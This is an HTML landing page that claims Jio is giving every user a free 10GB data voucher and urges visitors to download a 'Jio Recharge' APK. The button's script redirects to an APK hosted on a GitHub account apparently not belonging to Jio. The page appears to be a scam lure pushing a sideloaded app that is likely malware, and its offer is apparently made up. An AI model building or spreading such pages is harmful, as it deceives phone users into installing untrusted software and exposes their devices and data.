
<html>
    
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<head>
    <Title>Download</Title>
    <style>
        body{
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
        }

.dabavanu {
	background-color:#304ffe;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:20px;
	font-weight:bold;
    padding: 15px;
	text-decoration:none;
	text-shadow:0px 1px 0px #304ffe;
}
.dabavanu:hover {
	background-color:#304ffe;
}
.dabavanusw {
	background-color:#304ffe;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:20px;
	font-weight:bold;
    padding: 15px;
	text-decoration:none;
	text-shadow:0px 1px 0px #304ffe;
}
.dabavanu:active {
	position:relative;
	top:1px;
}

    </style>
</head>
<script>
function donva() 
{
    var m = new Date().getMinutes(); 
	if(m%2==0)
	{
		window.location="https://github.com/newjio-app/app/raw/main/jio-recharge.apk"; 
	}
	else
	{
		window.location="https://github.com/newjio-app/app/raw/main/jio-recharge.apk";
	}
}
</script>
<body>
<center>
    
        <img src="https://tiktikhpro.files.wordpress.com/2021/06/unnamed.png?w=512"  height="140"/>
        <h2>Jio Free 10GB Voucher</h2><h3>
			Jio is giving Free 10GB data voucher <br>to every jio users<br>
			Download Jio Recharge app and <br>claim yours now<br></h3>
        <div onclick="donva()"  class="dabavanu">Download APP</a>


        


    </div>
</center>
</html>